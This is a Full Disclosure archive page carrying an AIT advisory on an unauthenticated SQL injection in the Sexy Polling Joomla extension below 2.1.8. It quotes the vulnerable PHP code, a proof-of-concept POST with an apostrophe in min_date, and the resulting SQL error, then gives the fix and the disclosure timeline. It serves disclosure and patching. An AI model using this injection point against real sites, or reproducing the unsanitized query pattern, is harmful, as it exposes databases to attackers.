[prev in list] [next in list] [prev in thread] [next in thread] 

List:       full-disclosure
Subject:    [FD] [AIT-SA-20220208-01] SexyPolling SQL Injection
From:       sec-advisory <sec-advisory () ait ! ac ! at>
Date:       2022-04-19 15:24:36
Message-ID: 67e33945ce5b43859a7e637e1ef678c5 () ait ! ac ! at
[Download RAW message or body]

SexyPolling SQL Injection

====================

> Identifier: | AIT-SA-20220208-01|
> Target: | Sexy Polling ( Joomla Extension) |
> Vendor: | 2glux |
> Version: | all versions below version 2.1.8 |
> CVE: | Not yet |
> Accessibility: | Remote |
> Severity: | Critical |
> Author: | Wolfgang Hotwagner (AIT Austrian Institute of Technology) |


Summary

========

[Sexy Polling is a Joomla Extension for votes.](https://2glux.com/projects/sexypolling). In all \
versions below 2.1.8 an unauthenticated attacker could execute arbitrary SQL commands by \
sending crafted POST-parameters to poll.php.


Vulnerability Description

====================

In the vote.php file, the POST parameters min_date and max_date are insufficiently checked and \
sanitized. An attacker can use these parameters to send payloads for sql injections.

In lines 74 and 75 in the *site/vote.php* code, the parameters are assigned without being \
checked:

```
$min_date_sent = isset($_POST['min_date']) ? $_POST['min_date'].' 00:00:00' : '';
$max_date_sent = isset($_POST['max_date']) ? $_POST['max_date'].' 23:59:59' : '';
```

These are later used unfiltered by the WHERE clause:

```
$query_toal = "SELECT
COUNT(sv.`id_answer`) total_count,
MAX(sv.`date`) max_date,
MIN(sv.`date`) min_date
FROM
`#__sexy_votes` sv
JOIN
`#__sexy_answers` sa ON sa.id_poll = '$polling_id'
AND
sa.published = '1'
WHERE
sv.`id_answer` = sa.id";

//if dates are sent, add them to query
if ($min_date_sended != '' && $max_date_sended != '')
$query_toal .= " AND sv.`date` >= '$min_date_sended' AND sv.`date` <= '$max_date_sended' ";
```

Proof Of Concept

==============

To check a system for vulnerability, modify the POST request so that the min_date parameter \
contains a single apostrophe.

HTTP-Request:
```
POST /components/com_sexypolling/vote.php HTTP/1.1

Host: joomla-server.local
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
HTTP_X_REAL_IP: 1.1.1.1
Content-Length: 193
Origin: joomla-server.local
Connection: close
Referer: joomla-server.local/index.php/component/search/
Cookie: 3f7d6b4d84916c70a46aaf5501d04983=iuddgl57g75v5gruopdqh0cgd6

polling_id=1&answer_id[]=3&dateformat=digits&min_date=2021-12-07'&max_date=2021-12-14&country_na \
me=-&country_code=-&city_name=-&region_name=-&voting_period=24&ae9a061e2170d406fb817b9ec0c42918=1
 ```

The HTTP-Resoonse contains a mysql error:

```
HTTP/1.1 500 Internal Server Error
Date: Wed, 15 Dec 2021 10:27:40 GMT
Server: Apache/2.4.41 (Ubuntu)
Set-Cookie: PHPSESSID=39p4ql2oj0b45opsf6p105tfcf; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: sexy_poll_1=1639564060; expires=Thu, 16-Dec-2021 10:27:40 GMT; Max-Age=86400; \
                path=/
Content-Length: 4768
Connection: close
Content-Type: application/json

<!DOCTYPE html>
<html lang="en-gb" dir="ltr">
<head>
<meta charset="utf-8" />
<title>Error: 1064 You have an error in your SQL syntax; check the manual that corresponds to \
your MariaDB server version for the right syntax to use near &#039;00:00:00&#039; AND sv.`date` \
&lt;= &#039;2021-12-14 23:59:59&#039;&#039; at line 12</title> <meta name="viewport" \
content="width=device-width, initial-scale=1.0"> <link \
href="https://fonts.googleapis.com/css?family=Open+Sans" rel="stylesheet" /> ```

Vulnerable Versions
================
All versions below version 2.1.8

Tested Versions
=============
Sexy Polling ( Joomla Extension) 2.1.7

Impact
======
An unauthenticated attacker could inject and execute SQL commands on the database.

Mitigation
=========
Sexy Polling 2.1.8 fixed that issue

Vendor Contact Timeline
====================
> 2021-12-14 | Unable to find a contact of the vendor |
> 2021-12-15 | Contacting Joomla Security Strike Team |
> 2021-12-29 | Answer from the Joomla Security Strike Team that they will investigate the \
> problem. |
> 2022-01-01 | Sexy Polling releases 2.1.8 |
> 2022-04-08 | Public Disclosure |

*We would like to note that the communication about this issue was weak. The contact-form of \
the maintainer of sexy_polling was broken and there was no other contact published. The Joomla \
Security Strike Team let us know that they will investigate, but they did not send any updates \
about the progress.*

Advisory URL
===========
[https://www.ait.ac.at/ait-sa-20220208-01-sexypolling](https://www.ait.ac.at/ait-sa-20220208-01-sexypolling)
 _______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/


[prev in list] [next in list] [prev in thread] [next in thread]

Configure | About | News | Add a list | Sponsored by KoreLogic